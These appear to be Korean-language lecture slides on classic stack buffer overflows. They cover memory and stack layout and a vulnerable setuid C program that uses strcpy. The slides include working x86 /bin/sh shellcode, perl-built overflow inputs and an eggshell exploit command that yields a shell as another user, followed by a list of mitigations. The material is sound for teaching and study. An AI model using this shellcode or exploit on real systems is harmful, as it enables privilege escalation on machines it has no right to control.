Transcript basicofbof

Basic of Buffer Over Flow
S.S.G 방승원
Agenda
•
•
•
•
•
•
•
Introduction
Memory Structure
Stack Structure while Example
Target Program
Ready & Attack
Attack & Security
Application of Overflow
Introduction
• Overflow ??
– 넘치다, 넘쳐 흐르다;범람하다;
– <용기 등이> 가득 차다, 넘치다
• Buffer Over Flow ??
– 정해진 메모리보다 많은 데이터를 입력 받아
특정 영역을 덮음으로써 프로그램 흐름을 바
꿔 공격자가 원하는 코드를 실행하는 공격
– <Phrack Magazine 49-14>, Aleph One
Memory Structure
LOW
TEXT
DATA
HEAP
STACK
HIGH
• TEXT :
Program Code
• DATA :
Static Variable
Global Variable
• HEAP :
Dynamic Allocation
• STACK
Dynamic Varbiable
Local Variable
Stack Structure
Memory
LOW
Stack
HIGH
(0x08048000)
• LIFO(Last In First Out)
• PUSH
PUSH
POP
STACK
• POP
• SP(Stack Pointer)
• BP(Base Pointer)
Memory
HIGH
(0xbfffffff)
Stack
SP
LOW BP
Example Program
#include <stdio.h>
void func(int a, int b, int c)
{
int buf1;
char buf2[16];
}
void main()
{
func(1, 2, 3);
printf(“Hello, World!\n”);
}
Example Program
Memory
LOW
Stack
HIGH
(0x08048000)
STACK
Memory
HIGH
(0xbfffffff)
#include <stdio.h>
void func(int a, int b, int c)
{
int buf1;
char buf2[16];
}
void main()
{
func(1, 2, 3);
printf(“Hello, World!\n”);
Stack }
ESP
LOW EBP
Example Program
Stack ESP
HIGH main:
Memory
LOW
(0x08048000)
EBP
STACK
pushl $3
pushl $2
pushl $1
call func
addl $16, %esp
func:
Memory
HIGH
(0xbfffffff)
Stack
LOW
pushl %ebp
movl %esp, %ebp
subl $40, %esp
leave (pop %ebp
ret
Target Program
#include <stdio.h>
#include <string.h>
•
argc, argv
프로그램을 실행 할 때 인자를
입력받는 방법
ex) ./target bang 1234
argv = 3;
argv[0] = “target”;
argv[1] = “bang”;
argv[2] = “1234”;
•
strcpy(dest, src)
src가 가르키는 문자열을 dest로
복사
* 크기 제한이 없어
overflow 취약점 발생
void func(char *str)
{
char buf[64];
strcpy(buf, str);
}
void main(int argc, char *argv[])
{
func(argv[1]);
printf(“Hello, World\n”);
}
Target Program
• Setuid Bit 가 걸려있음
Set User ID Bit(number – 4000)
$ chmod 4755 target (or chmod u+s)
-rwsr-xr-x 1 level1 level1 target
 어떤 사용자든지 이 target을 실행할 땐
level1 유저권한을 갖게 됨
ex) passwd
• Redhat 9.0, Kernel 2.4.32, gcc 3.2.2-5
Target Program
• Let’s Run program
With a lot of ‘A’ Character!!!
• Result : Segmentation Fault
• Why??
Target Program
Stack ESP
HIGH #include <stdio.h>
Memory
LOW
#include <string.h>
(0x08048000)
void func(char *str)
{
char buf[64];
strcpy(buf, str);
}
STACK
EBP
void main(int argc, char *argv[])
{
Memory
HIGH
(0xbfffffff)
Stack
LOW
func(argv[1]);
printf(“Hello, World\n”);
}
Target Program
Memory
LOW
$ ./target `perl -e 'print "A"x71'`
64 Bytes
8 Bytes
4 Bytes
4 Bytes
Memory
HIGH
4 Bytes
STACK
[ AAAAAAAAAAAAAAAAAAAAAAAAAAA\0 ][ BBFFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
Stack
LOW
Stack
HIGH
Normal
Target Program
Memory
LOW
$ ./target `perl -e 'print "A"x72'`
64 Bytes
8 Bytes
4 Bytes
4 Bytes
Memory
HIGH
4 Bytes
STACK
[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][ 00FFFFBF ][ BBFFFF08 ][ BBFFFFBB ]
Stack
LOW
Stack
HIGH
Overflow
Target Program
Memory
LOW
$ ./target `perl -e 'print "A"x80'`
64 Bytes
8 Bytes
4 Bytes
Memory
HIGH
4 Bytes
4 Bytes
AAAA
][ BBFFFFBB ]
STACK
[ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA ][
AAAA
][
Stack
LOW
Stack
HIGH
Real
Overflow
Target Program
E
Memory
LOW
Stack
S
P
HIGH
(0x08048000)
STACK
E
B
P
Memory
HIGH
(0xbfffffff)
Stack
LOW
func: pushl
movl
subl
subl
pushl
leal
pushl
call
addl
leave
ret
main: movl
addl
pushl
call
addl
subl
%ebp
%esp, %ebp
$72, %esp
$8, %esp
8(%ebp)
-72(%ebp), %eax
%eax
strcpy
$16, %esp
12(%ebp), %eax
$4, %eax
(%eax)
func
$16, %esp
$12, %esp
Target Program
E
Memory
LOW
Stack
S
P
HIGH
(0x08048000)
STACK
E
B
P
Memory
HIGH
(0xbfffffff)
Stack
LOW
func: pushl
movl
subl
subl
pushl
leal
pushl
call
addl
leave
ret
main: movl
addl
pushl
call
addl
subl
%ebp
%esp, %ebp
$72, %esp
$8, %esp
8(%ebp)
-72(%ebp), %eax
%eax
strcpy
$16, %esp
12(%ebp), %eax
$4, %eax
(%eax)
func
$16, %esp
$12, %esp
Shell Code
• 쉘을 실행해주는 코드
#include <unistd.h>
void main()
{
char *shell[2];
setreuid(3001, 3001);
shell[0] = "/bin/sh";
shell[1] = NULL;
}
어셈코드
"\x31\xc0\x31\xdb\x31\xc9\x66\xbb”
“\xb9\x0b\x66\xb9\xb9\x0b\xb0\x46”
“\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88”
”\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3”
”\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31”
”\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
execve(shell[0], shell, NULL);
Attack Ready
• Segmentation Fault 확인
• 쉘코드 제작
• 쉘코드를 버퍼에다 넣었을 때, 그 버퍼의
주소를 찾아야 됨
• But, 버퍼의 주소를 추측하기가 어려움
• 그러므로 쉘 환경 변수에 쉘코드를 넣어서
사용하여 쉘코드의 주소를 계산해 주는
Eggshell 사용
Attack
bash-2.05b$ ./egg 512 200
Using address: 0xbffffa60
bash-2.05b$ ./target `perl -e 'print
"A"x76';(printf "\x60\xfa\xff\xbf")`
sh-2.05b$ id
uid=3001(level1) gid=1000(guest)
groups=1000(guest)
sh-2.05b$
Attack V.S Security
• Non-executable Stack
 Return Into Libc
 Omega Project
• Stack Guard and Stack Shield
 Bypass Stack Guard and Stack Shield
• Random Stacks
• Exec Shield(커널수준)
 Exec Shield 회피
• strcpy(), strcat(), gets(), fscanf(), scanf(),
sprintf() 등 사용 자제 -> strncpy() strncat() 사용
• And so on………
Application of Overflow
•
•
•
•
•
•
Windows, Unix, Linux, Mac
Local, Remote
Web -> ActiveX
Heap Overflow
Integer Overflow
Frame Pointer Overwrite